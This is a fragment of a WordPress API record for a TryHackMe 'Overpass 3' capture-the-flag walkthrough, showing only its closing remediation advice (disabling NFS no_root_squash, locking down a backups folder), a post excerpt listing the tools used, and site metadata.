\/><\/figure>\n<\/div>\n<ol>\n<li>Disable <code>no_root_squash<\/code> on NFS<\/li>\n<li>Change permissions on all parts of the website that are not intended to be seen by the public. This includes the <code>\/backups<\/code> folder<\/li>\n<\/ol>\n<p class=\"has-base-background-color has-background\"><img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/1f449.png\" alt=\"\ud83d\udc49\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" \/> <strong>Recommended Tutorial<\/strong>: <a href=\"https:\/\/blog.finxter.com\/tryhackme-walkthrough-wonderland\/\" data-type=\"post\" data-id=\"892288\" target=\"_blank\" rel=\"noreferrer noopener\">TryHackMe Challenge &#8211; Wonderland<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>5\/5 &#8211; (1 vote) BOX OVERVIEW Link: https:\/\/tryhackme.com\/room\/overpass3hosting Difficulty: Medium Target: web, user, root flags Highlight: port forwarding with chisel Tools: nmap, dirb, linpeas Technology: ftp, ssh, nfs PREMISE This is the third and final installment of the Overpass challenges on TryHackMe. Here are the other two overpass walkthroughs, just in case you missed them: [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-131088","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131088","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=131088"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131088\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=131088"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=131088"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=131088"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}